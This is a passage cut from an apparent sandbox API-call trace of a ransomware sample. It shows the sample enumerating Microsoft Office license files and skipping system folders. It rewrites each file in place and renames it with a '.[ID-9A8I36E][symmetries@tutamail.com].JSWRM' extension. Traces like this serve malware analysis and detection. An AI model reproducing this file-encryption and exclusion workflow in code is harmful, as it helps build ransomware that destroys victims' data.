ftCreationTime.dwLowDateTime=0xebf44bc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebf44bc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec0037aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51ba, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="VIF3FD~1.XRM")) returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.486] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0111.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0111.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0111.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0111.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0111.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0111.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0111.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.487] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20922) returned 1 [0111.487] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0111.487] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0111.490] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.490] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0111.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.490] CloseHandle (hObject=0x45c) returned 1 [0111.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0111.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0111.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0111.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0111.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0111.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.491] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0111.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0111.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.492] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebeac256, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebeac256, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebfb72be, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="VI17A4~1.XRM")) returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.492] lstrcmpiW (lpString1="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0111.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0111.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0111.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0111.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0111.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.493] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0111.493] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.494] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.510] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.510] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.511] CloseHandle (hObject=0x45c) returned 1 [0111.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0111.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0111.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0111.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0111.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0111.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0111.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.511] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0111.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0111.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.512] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfdd523, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebfdd523, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec09c0ea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5173, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Grace-ppd.xrm-ms", cAlternateFileName="VIAD4A~1.XRM")) returned 1 [0111.512] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0111.512] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0111.512] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0111.512] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0111.513] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.513] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.513] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.513] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.513] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.513] lstrcmpiW (lpString1="VisioProR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0111.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240fc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0111.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0111.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.514] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20851) returned 1 [0111.514] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0111.514] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0111.519] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.519] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0111.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.519] CloseHandle (hObject=0x45c) returned 1 [0111.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0111.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0111.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0111.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0111.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.520] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft 